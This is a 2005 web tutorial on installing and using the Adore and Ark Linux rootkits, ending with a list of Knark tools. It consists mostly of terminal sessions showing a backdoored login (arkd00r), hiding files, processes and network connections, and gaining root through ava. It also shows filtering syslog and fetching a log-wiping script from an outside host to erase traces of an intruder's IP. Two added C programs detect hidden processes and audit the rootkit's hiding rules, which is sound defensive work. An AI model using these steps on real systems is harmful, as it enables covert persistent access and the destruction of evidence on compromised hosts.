Using rootkits
Source: www.vfocus.net  Author: vfocus  Published: 2005-07-15


1 Introduction to rootkits
2 Using rootkits
- Using the Adore rootkit
- Using the Ark rootkit
- Using the Knark rootkit
- Using the T0rn rootkit
- Using the Tuxit rootkit
3 Conclusion

1 Introduction to rootkits

Rootkits appeared in the early 1990s; since then well over a dozen variants have emerged, and they keep being ported to new systems. Almost every rootkit is assembled from independent programs. So what is a rootkit for? Its purpose is to preserve the attacker's access to a host after breaking in; you can think of a rootkit as a collection of backdoors. Since a rootkit is a backdoor, let's look at backdoors first.

Backdoors:
- Login backdoor: replace /bin/login with a trojaned login.c, so the attacker can log in with a password of their own.
- Telnet backdoor: plant a trojan in in.telnetd, so the attacker can log in with their own password.
- Services backdoor: like the telnet backdoor, but replacing programs such as ftpd or rlogind.
- Cronjob backdoor: run a backdoor program on a schedule.
- Library backdoor: a shared-library backdoor; the backdoor code is injected into a shared library.
- Kernel backdoor: a module inserted into the kernel, mostly used to hide files and processes.
- Network traffic backdoor: the most common kind; for example backdoors that speak UDP or ICMP. pingshell is one example.

A rootkit package combines the backdoors above; it contains a bit of everything. An example:

[root@chi lrk4]# ls
MCONFIG chksniff inetd procps-1.01 tcpd_7.4
Makefile chsh linsniffer.c psmisc-17 wted.c
README cron3.0pl1 login rootkit.h z2.c
bin fileutils-3.13 rshd
bindshell.c findutils net-tools-1.32-alpha shadow-961025
chfn fix.c passwd sysklogd-1.3

Let's see what the lrk4.tar.gz package above contains:
inetd and login: trojaned versions of the daemons
bindshell.c: a small bind-shell backdoor
z2.c and wted.c: log cleaners (z2 zaps utmp/wtmp/lastlog entries, wted edits wtmp)
chsh: trojaned chsh that gives a local user root
fix: fakes file attributes (timestamps, checksums) so a trojaned binary looks like the original
linsniffer.c and chksniff: the first is a sniffer; chksniff checks whether a sniffer is running (an interface in promiscuous mode)
passwd: like chsh, a trojaned binary for local privilege escalation

That is only a very short introduction. The package also carries replacements for ls, ps, pstree and so on, used to hide files and processes.

===========================================================

2 Using rootkits

======================================================================

2.1 Using the Adore rootkit

adore is a Linux LKM (Loadable Kernel Module) rootkit written by Stealth. It works with the Linux 2.2.x and 2.4.x kernels. Its core is an LKM called adore.o. Besides that there is a module cleaner.o used to hide adore.o from the module list, a control tool ava, and a start script startadore.
---------------------------------------------------------------------------------------

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: chi
Password:
[chi@chi chi]$ su root
Password:
[root@chi chi]# ls
adore-0.42.gz
[root@chi chi]# tar -xzvf adore*
adore/
adore/CVS/
adore/CVS/Root
adore/CVS/Repository
adore/CVS/Entries
adore/CVS/Tag
adore/Changelog
adore/LICENSE
adore/Makefile.gen
adore/README
adore/TODO
adore/adore.c
adore/adore.h
adore/ava.c
adore/cleaner.c
adore/configure
adore/dummy.c
adore/libinvisible.c
adore/libinvisible.h
adore/rename.c
adore/startadore
[root@chi chi]# ls
adore adore-0.42.gz
[root@chi chi]# cd adore
[root@chi adore]# ls
CVS Makefile.gen adore.c cleaner.c libinvisible.c startadore
Changelog README adore.h configure libinvisible.h
LICENSE TODO ava.c dummy.c rename.c
[root@chi adore]# ./configure && make

Starting adore configuration ...

Checking 4 ELITE_UID ... found 30
Checking 4 ELITE_CMD ... using 28460
Checking 4 SMP ... NO
Checking 4 MODVERSIONS ... YES
Checking for kgcc ... found cc
Checking 4 insmod ... found /sbin/insmod -- OK

Loaded modules:
lockd 30344 1 (autoclean)
sunrpc 52132 1 (autoclean) [lockd]
pcnet32 10308 1 (autoclean)
BusLogic 86060 6

Since version 0.33 Adore requires authentication for
its services. You will be prompted for a password now and this
password will be compiled into adore and ava so no further actions
by you are required.
This procedure will save adore from scanners.
Try to choose a unique name that wont clash with normal calls to mkdir(2).
Password (echoed):111111 <------------------ enter the password

Preparing /home/chi/adore (== cwd) for hiding ...

Creating Makefile ...

*** Edit adore.h for the hidden services and redirected file-access ***
cp: Makefile: No such file or directory
rm -f adore.o
cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=28460 -DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"111111\" -DMODVERSIONS adore.c -o adore.o
cc -O2 -Wall -DELITE_CMD=28460 -DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"111111\" -DMODVERSIONS ava.c libinvisible.c -o ava
cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=28460 -DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"111111\" -DMODVERSIONS cleaner.c
[root@chi adore]# ls
CVS Makefile.gen adore.h cleaner.c libinvisible.c
Changelog README adore.o cleaner.o libinvisible.h
LICENSE TODO ava configure rename.c
Makefile adore.c ava.c dummy.c startadore
[root@chi adore]#

At this point adore is built. Let's see what the files above are:

Changelog
LICENSE
Makefile.gen <-- use this if the configure script fails
README
TODO
adore.c <-- source of the adore.o module
adore.h
ava.c <-- the control command
cleaner.c <-- source of cleaner.o, which hides the adore module
configure <-- install script
dummy.c
libinvisible.c <-- libinvisible is the interface between ava and the adore module
libinvisible.h
rename.c
startadore <-- start script

Now that we know startadore is the start script, run it first, then the ava program.

[root@chi adore]# ./startadore <----- over the remote login /sbin is missing from PATH
./startadore: insmod: command not found
./startadore: insmod: command not found
./startadore: rmmod: command not found
[root@chi adore]# find / -name insmod
find: /proc/6/fd: Permission denied
/sbin/insmod
[root@chi adore]# export | grep PATH
declare -x PATH="/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/chi/bin"
[root@chi adore]# export PATH=$PATH:/sbin
[root@chi adore]# export | grep PATH
declare -x PATH="/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/chi/bin:/sbin"
[root@chi adore]# ls
CVS Makefile.gen adore.h cleaner.c libinvisible.c
Changelog README adore.o cleaner.o libinvisible.h
LICENSE TODO ava configure rename.c
Makefile adore.c ava.c dummy.c startadore
[root@chi adore]# ./startadore
[root@chi adore]# <--------------- startadore works now

Now try whether ava works:

[root@chi adore]# ./ava
Usage: ./ava [file, PID or dummy (for U)]

h hide file <-- hide a file
u unhide file <-- unhide a file
r execute as root <-- run a program with root privileges
R remove PID forever <-- remove a process permanently
U uninstall adore <-- unload the adore module
i make PID invisible <-- hide a process
v make PID visible <-- make a process visible again

[root@chi adore]#

Suppose I have a directory under /tmp that I want to hide. With adore this is simple.

[root@chi adore]# cd /tmp
[root@chi /tmp]# ls
install.log
[root@chi /tmp]# mkdir rootkit
[root@chi /tmp]# ls
install.log rootkit
[root@chi /tmp]# cd /home/chi/adore
[root@chi adore]# ./ava h /tmp/rootkit
Checking for adore 0.12 or higher ...
Adore 0.42 installed. Good luck.
File /tmp/rootkit hided.
[root@chi adore]# cd /tmp
[root@chi /tmp]# ls <----- look at /tmp
install.log <----- see, rootkit is gone
[root@chi /tmp]#

Now let's look at hiding a process...
[root@chi adore]# ps -a
PID TTY TIME CMD
630 tty1 00:00:00 bash
653 pts/0 00:00:00 bash
673 pts/0 00:00:00 su
674 pts/0 00:00:00 bash
743 pts/1 00:00:00 bash <--- the process we want to hide
773 pts/1 00:00:00 su
774 pts/1 00:00:00 bash
807 pts/1 00:00:00 ps
[root@chi adore]# ./ava i 743
Checking for adore 0.12 or higher ...
Adore 0.42 installed. Good luck.
Made PID 743 invisible.
[root@chi adore]# ps -a
PID TTY TIME CMD
630 tty1 00:00:00 bash
653 pts/0 00:00:00 bash
673 pts/0 00:00:00 su
674 pts/0 00:00:00 bash <---- look here, the process is gone
773 pts/1 00:00:00 su
774 pts/1 00:00:00 bash
809 pts/1 00:00:00 ps
[root@chi adore]#
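
The hiding shown above works because adore hooks the getdents() system call and drops the hidden PID from the listing of /proc, which is all that ps reads; the process itself keeps running. The following is an added example (my code, not adore's and not part of the original article) that turns this into a check: list /proc with readdir(), then probe every PID with kill(pid, 0); a PID that answers the probe but is missing from the listing is hidden. MAX_PID of 32768 is an assumption for a 2.2/2.4 kernel (read /proc/sys/kernel/pid_max on newer systems).

```c
/*
 * Added example; not part of the article and not adore's own code.
 * Looks for processes that a getdents()-hooking LKM rootkit (adore's
 * "ava i PID" above) removes from the listing of /proc, and so from ps,
 * while the process itself keeps running.
 *
 * Method: take the readdir() view of /proc, then probe every PID up to
 * MAX_PID with kill(pid, 0); a PID that answers the probe but is absent
 * from /proc is hidden.  /proc is listed again afterwards so that a
 * process started during the probe is not reported as hidden.
 *
 * Caveat: a rootkit that also filters kill()/stat() for hidden PIDs will
 * not be caught; then only an offline or clean-boot check is trustworthy.
 */
#include <ctype.h>
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_PID 32768   /* pid_max of a 2.2/2.4 kernel (assumption) */

/* 1 if s is a non-empty run of decimal digits (a PID directory name). */
int is_numeric(const char *s)
{
    if (*s == '\0')
        return 0;
    for (; *s; s++)
        if (!isdigit((unsigned char)*s))
            return 0;
    return 1;
}

/*
 * Pure set difference so it can be tested without a live system: every
 * PID in probed[] that does not appear in listed[] is copied to out[].
 * Returns the number of PIDs written.
 */
size_t hidden_pids(const int *listed, size_t nlisted,
                   const int *probed, size_t nprobed,
                   int *out, size_t outcap)
{
    size_t found = 0;
    for (size_t i = 0; i < nprobed; i++) {
        int seen = 0;
        for (size_t j = 0; j < nlisted && !seen; j++)
            seen = (listed[j] == probed[i]);
        if (!seen && found < outcap)
            out[found++] = probed[i];
    }
    return found;
}

/* PIDs visible through readdir("/proc"). */
static size_t list_proc(int *out, size_t cap)
{
    size_t n = 0;
    DIR *d = opendir("/proc");
    struct dirent *e;
    if (d == NULL)
        return 0;
    while ((e = readdir(d)) != NULL && n < cap)
        if (is_numeric(e->d_name))
            out[n++] = atoi(e->d_name);
    closedir(d);
    return n;
}

/* PIDs that exist according to kill(pid, 0); EPERM also means "exists". */
static size_t probe_pids(int *out, size_t cap)
{
    size_t n = 0;
    for (int pid = 1; pid <= MAX_PID && n < cap; pid++)
        if (kill(pid, 0) == 0 || errno == EPERM)
            out[n++] = pid;
    return n;
}

int main(void)
{
    static int before[MAX_PID], after[MAX_PID], probed[MAX_PID];
    static int cand[MAX_PID], hidden[MAX_PID];
    size_t nb = list_proc(before, MAX_PID);
    size_t np = probe_pids(probed, MAX_PID);
    size_t na = list_proc(after, MAX_PID);
    /* hidden = probed minus the first listing, minus anything that showed up in the second */
    size_t nc = hidden_pids(before, nb, probed, np, cand, MAX_PID);
    size_t nh = hidden_pids(after, na, cand, nc, hidden, MAX_PID);

    printf("/proc lists %zu PIDs, kill() probe finds %zu\n", nb, np);
    for (size_t i = 0; i < nh; i++)
        printf("HIDDEN: pid %d answers kill() but is absent from /proc\n", hidden[i]);
    return nh ? 1 : 0;
}
```

Run it as root so that kill(pid, 0) is not refused for other users' processes (EPERM is treated as "exists" anyway). Against a user-space trojan such as ark's ps in section 2.2 the kernel's /proc listing is already complete, so the same hidden_pids() comparison between the readdir() list and the PIDs that ps prints is enough; the kill() probe is only needed when the kernel itself lies.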

Let's run a program with root privileges...

[chi@chi adore]$ su root
Password:
[root@chi adore]# cp /bin/sh /home/chi/adore/.sh3 <-------- .sh3 gets no suid bit; it is just an ordinary executable.
[root@chi adore]# exit
exit
[chi@chi adore]$ ./ava r .sh3 <---- note that you are not root here.

Checking for adore 0.12 or higher ...
Adore 0.42 installed. Good luck.
[root@chi adore]# <---- and now you are root.

==============================================================

2.2 Using the Ark rootkit

Ark's full name is Ambient's Rootkit for Linux; I am using version 1.0.1. It consists mainly of backdoored replacements of system programs. Let's open the package and look.

syslogd: any log line that matches a string recorded in /dev/ptyxx/.log is filtered out of syslogd's output.
login: replaces /bin/login; over telnet, log in with user arkd00r and pass <your password>.
sshd: replaces sshd; over ssh, log in with user root and pass <your password>.
ls: replacement ls that hides files or programs; the names to hide are listed in /dev/ptyxx/.file.
du: same as ls.
ps: hides processes; what to hide is listed in /dev/ptyxx/.proc.
Example:
0 0 hide all processes running as uid 0 (root)
1 p0 hide all processes on tty p0
2 sniffer hide every process whose command line contains "sniffer"
pstree: like ps.
killall: like ps.
top: like ps.
netstat: hides connections and ports; the rules are kept in /dev/ptyxx/.addr.
The rule types are:
0: hide uid
1: hide local address
2: hide remote address
3: hide local port
4: hide remote port
5: hide UNIX socket path
Examples:
0 500 <--- hide all connections belonging to uid 500
1 128.31 <---- hide all connections whose local address is 128.31.xxx.xxx

Next, let's install the ark rootkit:

[root@chi chi]# ls
ark-1.0.1.tar.gz
[root@chi chi]# tar -xzvf ark*
ark-1.0.1/
ark-1.0.1/README
ark-1.0.1/ark
ark-1.0.1/compile
ark-1.0.1/du
ark-1.0.1/killall
ark-1.0.1/login-normal
ark-1.0.1/login-shadow
ark-1.0.1/ls
ark-1.0.1/netstat
ark-1.0.1/ps
ark-1.0.1/pstree
ark-1.0.1/sshd
ark-1.0.1/syslogd
ark-1.0.1/top

gzip: stdin: decompression OK, trailing garbage ignored
ark-1.0.1/VERSION
tar: Child returned status 2
tar: Error exit delayed from previous errors
[root@chi chi]# ls
ark-1.0.1 ark-1.0.1.tar.gz
[root@chi chi]# cd ark-1.0.1
[root@chi ark-1.0.1]# ls
README ark du login-normal ls ps sshd top
VERSION compile killall login-shadow netstat pstree syslogd
[root@chi ark-1.0.1]# ./ark
ARK-[ You may want to supply a password..
----[ Usage: ./ark <password>

[root@chi ark-1.0.1]# ./ark 111111 <---- 111111 is the password you choose.

ARK-[ Welcome to ARK version 1.0.1..

System info:
+ Host: chi
+ IP: 192.168.25.5
+ Bogomips: 1042.02

Lets see what we got on this baby..
+ Passwd? Shadowed
+ Sshd? Yes

Mmmkay.. Time to backdoor thiz slut.. ;)
+ Syslogd:
+ /sbin/syslogd
+ Login:
+ /bin/login
+ Sshd:
/etc/sshd_config: No such file or directory <----- no sshd config and host key at the paths ark's sshd expects.
error: fatal: Could not load host key: /etc/ssh_host_key. Check path and permissions.
+ /usr/sbin/sshd
+ Ls & Du:
+ /bin/ls
+ /usr/bin/du
+ Ps, Pstree, Top, Killall:
+ /bin/ps
+ /usr/bin/pstree
+ /usr/bin/killall
+ /usr/bin/top
+ Netstat:
+ /bin/netstat

----[ Backdooring Completed!
[root@chi ark-1.0.1]#

Let's test whether /bin/login works!

[chi@chi chi]$ telnet localhost <---- telnet to ourselves.
Trying 127.0.0.1...
Connected to chi.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: arkd00r <---- user name arkd00r
Password: <---- the password you defined earlier, 111111 here

[root@chi /root]# <---- you are root now

It works. Now let's look at the others; run ps and pstree:

Below is the output before the trojaned ps was installed:

[root@chi chi]# ps
PID TTY TIME CMD
691 pts/0 00:00:00 login
712 pts/0 00:00:00 su
713 pts/0 00:00:00 bash
724 pts/0 00:00:00 ps
[root@chi chi]# ps -a
PID TTY TIME CMD
638 tty1 00:00:00 bash
692 pts/0 00:00:00 bash
712 pts/0 00:00:00 su
713 pts/0 00:00:00 bash
725 pts/0 00:00:00 ps

Below is the output after the trojaned ps was installed:

[root@chi ark-1.0.1]# ps
PID TTY STAT TIME COMMAND
630 1 S 0:00 login -- root
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
633 4 S 0:00 /sbin/mingetty tty4
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
713 ? S 0:00 bash
818 ? R 0:00 ps
[root@chi ark-1.0.1]# ps -a
warning: `-' deprecated; use `ps a', not `ps -a' <------- notice the difference: the replacement ps prints a different format and this warning!
PID TTY STAT TIME COMMAND
630 1 S 0:00 login -- root
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
633 4 S 0:00 /sbin/mingetty tty4
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
713 ? S 0:00 bash
820 ? R 0:00 ps -a
692 ? S 0:00 -bash

Comparing the two listings shows where the replacement differs from the distribution's ps (different columns and the deprecation warning), so this ps is not perfect. No offence to the author; I am only pointing it out, I could not write one myself.
Enough chatter; let's see how to hide things with this ps. As described above, ps reads /dev/ptyxx/.proc, so first check whether that directory exists.

[root@chi ark-1.0.1]# cd /dev/ptyxx/
bash: /dev/ptyxx/: No such file or directory
[root@chi ark-1.0.1]# cd /dev
[root@chi /dev]# ls | grep ptyx
ptyx0
ptyx1
ptyx2
ptyx3
ptyx4
ptyx5
ptyx6
ptyx7 <--------- there is no ptyxx, so we have to mkdir it ourselves
ptyx8
ptyx9
ptyxa
ptyxb
ptyxc
ptyxd
ptyxe
ptyxf
[root@chi /dev]# mkdir ptyxx
[root@chi /dev]# cd ptyxx
[root@chi ptyxx]# cat > .proc

[root@chi ptyxx]# ps
PID TTY STAT TIME COMMAND
630 1 S 0:00 login -- root
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
633 4 S 0:00 /sbin/mingetty tty4
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
713 ? S 0:00 bash
831 ? R 0:00 ps
[root@chi ptyxx]#

Looking at the processes above, I now want to hide these three:
633 4 S 0:00 /sbin/mingetty tty4
691 ? S 0:00 login -- chi
712 ? S 0:00 su root
Watch how I do it:

[root@chi ptyxx]# cat >> .proc
1 4
2 login
2 su

[root@chi ptyxx]# ps
PID TTY STAT TIME COMMAND
631 2 S 0:00 /sbin/mingetty tty2
632 3 S 0:00 /sbin/mingetty tty3
634 5 S 0:00 /sbin/mingetty tty5
635 6 S 0:00 /sbin/mingetty tty6
638 1 S 0:00 -bash
713 ? S 0:00 bash
835 ? R 0:00 ps
[rot@chi ptyxx]#

Compare the two listings and the three are gone! Note that rule `2 login` is a substring match, so it also removed PID 630 (`login -- root`), and `2 su` would hide any command containing "su". I keep rambling; next, the ls program!
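
The three rule types are easy to misread, and the listings above show that a substring rule hides more than intended. The following is an added example (my code, not part of ark or of the article) that parses a .proc file and applies its rules to the ps listing from the article, constructed inline with assumed uids, so the effect of each rule type can be checked offline, for instance on a .proc file recovered from a compromised host.

```c
/*
 * Added example; not ark's own code.  Re-implements, on a constructed
 * process table, the decision the trojaned ps/pstree/top/killall make
 * from /dev/ptyxx/.proc, so an analyst who recovers that file can see
 * exactly which processes were being hidden.
 *
 * Rule syntax (from the description above), one rule per line:
 *   0 <uid>      hide every process owned by that uid
 *   1 <tty>      hide every process on that tty
 *   2 <string>   hide every process whose command line contains string
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct proc_rec  { int pid; int uid; const char *tty; const char *cmd; };
struct hide_rule { int type; char value[64]; };

/* Parse the text of .proc into rules; blank or malformed lines are skipped. */
size_t parse_proc_rules(const char *text, struct hide_rule *rules, size_t cap)
{
    size_t n = 0;
    while (*text && n < cap) {
        const char *nl = strchr(text, '\n');
        size_t len = nl ? (size_t)(nl - text) : strlen(text);
        char line[128];
        int type;
        char value[64];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, text, len);
        line[len] = '\0';
        if (sscanf(line, "%d %63s", &type, value) == 2 && type >= 0 && type <= 2) {
            rules[n].type = type;
            strcpy(rules[n].value, value);
            n++;
        }
        if (nl == NULL)
            break;
        text = nl + 1;
    }
    return n;
}

/* 1 if this rule makes the trojaned ps drop the process. */
int rule_hides(const struct hide_rule *r, const struct proc_rec *p)
{
    switch (r->type) {
    case 0:  return atoi(r->value) == p->uid;
    case 1:  return strcmp(r->value, p->tty) == 0;
    case 2:  return strstr(p->cmd, r->value) != NULL;   /* substring, not whole word */
    default: return 0;
    }
}

/* Apply every rule to every process; hidden[] receives the PIDs that vanish. */
size_t apply_proc_rules(const struct hide_rule *rules, size_t nrules,
                        const struct proc_rec *procs, size_t nprocs,
                        int *hidden, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; i < nprocs && n < cap; i++)
        for (size_t j = 0; j < nrules; j++)
            if (rule_hides(&rules[j], &procs[i])) {
                hidden[n++] = procs[i].pid;
                break;
            }
    return n;
}

/* Constructed process table: the ps listing from the article; uids are assumed. */
static const struct proc_rec sample_procs[] = {
    {630, 0,   "1", "login -- root"},
    {631, 0,   "2", "/sbin/mingetty tty2"},
    {632, 0,   "3", "/sbin/mingetty tty3"},
    {633, 0,   "4", "/sbin/mingetty tty4"},
    {634, 0,   "5", "/sbin/mingetty tty5"},
    {635, 0,   "6", "/sbin/mingetty tty6"},
    {638, 0,   "1", "-bash"},
    {691, 0,   "?", "login -- chi"},
    {712, 500, "?", "su root"},
    {713, 0,   "?", "bash"},
    {831, 0,   "?", "ps"},
};
#define NSAMPLE (sizeof sample_procs / sizeof sample_procs[0])

/* The .proc contents written in the article. */
static const char sample_rules[] = "1 4\n2 login\n2 su\n";

/* Parse sample_rules and apply them to sample_procs. */
size_t demo_hidden(int *hidden, size_t cap)
{
    struct hide_rule rules[16];
    size_t nr = parse_proc_rules(sample_rules, rules, 16);
    return apply_proc_rules(rules, nr, sample_procs, NSAMPLE, hidden, cap);
}

int main(void)
{
    int hidden[NSAMPLE];
    size_t n = demo_hidden(hidden, NSAMPLE);
    printf("%zu of %zu processes would be dropped from ps:", n, (size_t)NSAMPLE);
    for (size_t i = 0; i < n; i++)
        printf(" %d", hidden[i]);
    printf("\n");   /* 4 of 11: 630 633 691 712 */
    return 0;
}
```

The result is four hidden processes, not three: `2 login` matches `login -- root` as well as `login -- chi`. The same "type value" line format is used by /dev/ptyxx/.addr for netstat, with the six rule types listed above.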

[root@chi chi]# ls
ark-1.0.1 ark-1.0.1.tar.gz <---- we want to hide the ark-1.0.1 directory
[root@chi chi]# vi /dev/ptyxx/.file

ark-1.0.1
~
~
~
~
"/dev/ptyxx/.file" 2L, 14C written
[root@chi chi]# ls <---- gone
ark-1.0.1.tar.gz
[root@chi chi]#

Next come netstat and syslogd. Below is the output of netstat -a before any filtering:

[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN
tcp 0 0 *:1024 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:ntalk *:*
udp 0 0 *:talk *:*
udp 0 0 *:937 *:*
udp 0 0 *:1024 *:*
udp 0 0 *:sunrpc *:*
raw 0 0 *:icmp *:* 7
raw 0 0 *:tcp *:* 7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 0 [ ACC ] STREAM LISTENING 528 /dev/printer
unix 0 [ ] STREAM CONNECTED 168 @00000017
unix 1 [ ] DGRAM 882 /dev/log
unix 0 [ ACC ] STREAM LISTENING 617 /tmp/.font-unix/fs-1
unix 0 [ ACC ] STREAM LISTENING 589 /dev/gpmctl
unix 0 [ ] DGRAM 963
unix 0 [ ] DGRAM 741
unix 0 [ ] DGRAM 653
unix 0 [ ] DGRAM 620
unix 0 [ ] DGRAM 571
unix 0 [ ] DGRAM 522
unix 0 [ ] DGRAM 444
unix 0 [ ] DGRAM 433
[root@chi chi]#

Of course we want to hide certain connections. Look at the telnet session above: anyone can see at a glance that someone is connected to your telnet, and then you're done for!

Now we want to hide:

tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED
tcp 0 0 *:1024 *:* LISTEN

After adding the corresponding rules to /dev/ptyxx/.addr, look at the output again:

[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:smtp *:* LISTEN <--------- the telnet connection is gone
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN <---------- port 1024 is gone
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:ntalk *:*
udp 0 0 *:talk *:*
udp 0 0 *:937 *:*
udp 0 0 *:sunrpc *:*
raw 0 0 *:icmp *:* 7
raw 0 0 *:tcp *:* 7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 0 [ ACC ] STREAM LISTENING 528 /dev/printer
unix 0 [ ] STREAM CONNECTED 168 @00000017
unix 1 [ ] DGRAM 882 /dev/log
unix 0 [ ACC ] STREAM LISTENING 617 /tmp/.font-unix/fs-1
unix 0 [ ACC ] STREAM LISTENING 589 /dev/gpmctl
unix 0 [ ] DGRAM 963
unix 0 [ ] DGRAM 741
unix 0 [ ] DGRAM 653
unix 0 [ ] DGRAM 620
unix 0 [ ] DGRAM 571
unix 0 [ ] DGRAM 522
unix 0 [ ] DGRAM 444
unix 0 [ ] DGRAM 433

Only syslogd is left. If you don't know how syslogd works, look it up first, because understanding syslogd matters here :-)

[root@chi chi]# cd /var/log
[root@chi log]# ls
boot.log htmlaccess.log maillog news sendmail.st wtmp
cron httpd messages samba spooler xferlog
dmesg lastlog netconf.log secure uucp
[root@chi log]# cat messages | grep 192.168.25.1
May 1 00:02:56 chi ftpd[659]: FTP LOGIN FROM 192.168.25.1 [192.168.25.1], chi
May 2 00:04:52 chi ftpd[653]: FTP LOGIN FROM 192.168.25.1 [192.168.25.1], chi
May 2 04:20:26 chi ftpd[661]: FTP LOGIN FROM 192.168.25.1 [192.168.25.1], chi
May 2 04:20:52 chi sshd[664]: connect from 192.168.25.1
May 2 04:20:52 chi sshd[664]: log: Connection from 192.168.25.1 port 3429
May 2 04:20:52 chi sshd[664]: log: Could not reverse map address 192.168.25.1.
May 2 04:21:13 chi sshd[665]: connect from 192.168.25.1
May 2 04:21:13 chi sshd[665]: log: Connection from 192.168.25.1 port 3430
May 2 04:21:13 chi sshd[665]: log: Could not reverse map address 192.168.25.1.
May 2 04:21:35 chi sshd[666]: connect from 192.168.25.1
May 2 04:21:35 chi sshd[666]: log: Connection from 192.168.25.1 port 3431
May 2 04:21:35 chi sshd[666]: log: Could not reverse map address 192.168.25.1.
May 2 04:21:41 chi sshd[666]: log: ROOT LOGIN as root from 192.168.25.1 <------ I once logged in as root over ssh, and it was recorded!
May 2 04:21:44 chi sshd[666]: log: Closing connection to 192.168.25.1
[root@chi log]#

Now add the strings to filter to /dev/ptyxx/.log. The trojaned syslogd only drops lines written from now on, so the entries already in /var/log are removed afterwards with cleaner.sh; that way nobody finds out!

[root@chi /root]# vi /dev/ptyxx/.log
192.168.25.1
~
~
~
~
"/dev/ptyxx/.log" 2L, 14C written

[root@chi /root]# wget http://9836.com/exploit/cleaner.sh
bash: wget: command not found
[root@chi /root]# /bin/wget
bash: /bin/wget: No such file or directory <------------ no wget
[root@chi /root]# ftp 192.168.25.1 <------------ so use ftp instead
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0).
Name (192.168.25.1:root): chi
331 Password required for chi.
Password:
230 User chi logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
11-17-02 01:14AM 1323 cleaner.sh
226 Transfer complete.
ftp> get cleaner.sh <------- download cleaner.sh
local: cleaner.sh remote: cleaner.sh
200 PORT command successful.
150 Opening ASCII mode data connection for cleaner.sh(1323 bytes).
WARNING! 64 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
1323 bytes received in 0.001 secs (1.3e+03 Kbytes/sec)
ftp> by
221
[root@chi /root]# ls
cleaner.sh
[root@chi /root]# ./cleaner.sh
bash: ./cleaner.sh: Permission denied
[root@chi /root]# chmod 777 cleaner.sh <---- make it executable (chmod +x would be enough)
[root@chi /root]# ./cleaner.sh
-------------------------------------------------------------------------
Cleaner 0.1 By DeX <-> dex@raza-mexicana.org <-> www.raza-mexicana.org
-------------------------------------------------------------------------
Word: 192.168.25.1 <------ remove every login record mentioning 192.168.25.1.
===============================================

[ ] /var/log/boot.log
[ ] /var/log/cron
[ ] /var/log/dmesg
[ ] /var/log/htmlaccess.log
Omitiendo /var/log/lastlog
[ ] /var/log/maillog
[X] /var/log/messages
[ ] /var/log/netconf.log
[X] /var/log/secure
[ ] /var/log/sendmail.st
[ ] /var/log/spooler
Omitiendo /var/log/wtmp
[X] /var/log/xferlog
===============================================

3 Logs limpiados.
[root@chi /root]# exit <--- all done; I have said far too much, haha!

===============================================================

2.3 Using the Knark rootkit

Knark was written by creed@sekure.net; the latest version is 0.59. I don't know whether anyone has a newer one, because knark 0.59 is built for the 2.2.x kernel, which means it only works on Red Hat 6.x and is of no use on Red Hat 7.x. A pity; the two rootkits above were also tested on Red Hat 6.2. Never mind: cyberwinds ported knark to kernel 2.4.3, so we can use it again, although because of version dependencies knark-2.4.3.tgz only works on Mandrake Linux with kernel 2.4.3-20.

The knark-0.59.tar.gz package contains:
- hidef: hides files on the system
- nethide: hides entries matching a string from /proc/net/tcp and /proc/net/udp
- ered: configures execution redirection
- rootme: gives an unprivileged user root access
- taskhack: changes the uid and gid of a running process
- rexec: executes commands remotely on a host running the knark module
